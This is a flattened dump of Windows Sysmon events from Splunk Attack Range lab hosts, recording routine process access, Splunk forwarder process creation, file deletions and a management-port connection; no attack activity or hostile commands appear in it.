12:27:29.751{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045579Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:29.751{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045578Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:29.751{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045577Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:29.751{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E5B1-63C7-7206-00000000AF02}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045576Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:29.751{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E5B1-63C7-7206-00000000AF02}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045575Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:29.751{FE4C2B44-E5B1-63C7-7206-00000000AF02}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000045574Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:29.560{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5263218C099DB4C818387753F075D1F8,SHA256=C2EAEF762B0EFEBC6B842056BFD6AFE53C04FBCCA75A01408711DA0F308709B5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045573Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:29.557{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=1F8C27333C926B2A10A7908776C7DBCF,SHA256=9A80D3525CBB22387C28C7829EB5C26F2EDC665F6165DF861F616980FDC366F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017985Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.824{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E5B1-63C7-2802-00000000B002}608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017984Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.824{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017983Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.824{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017982Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.824{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017981Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.824{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017980Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.824{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017979Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.824{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017978Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.824{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017977Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.824{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017976Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.824{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017975Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.824{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E5B1-63C7-2802-00000000B002}608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017974Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.824{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E5B1-63C7-2802-00000000B002}608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017973Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.825{E5A8D418-E5B1-63C7-2802-00000000B002}608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000017972Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.554{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=95C7FF9231CC3E42AAE11B2658E08F9C,SHA256=20639C3C6A7B37461D11CAD1C076B8D651E6457C9DDE11DBE6B483014AD13AE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017971Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.482{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B0C3D4F7200FC3532BF9ECE302F255A,SHA256=C82CCBAF53C7C5F6CDCB84369C79BFF4218B8CD17292CCAE2343838330F732C3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045572Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:27.180{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56431-false10.0.1.12-8089- 10341000x800000000000000017970Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.154{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E5B1-63C7-2702-00000000B002}4012C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017969Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.154{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017968Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.154{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017967Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.154{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017966Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:29.154{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017965Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 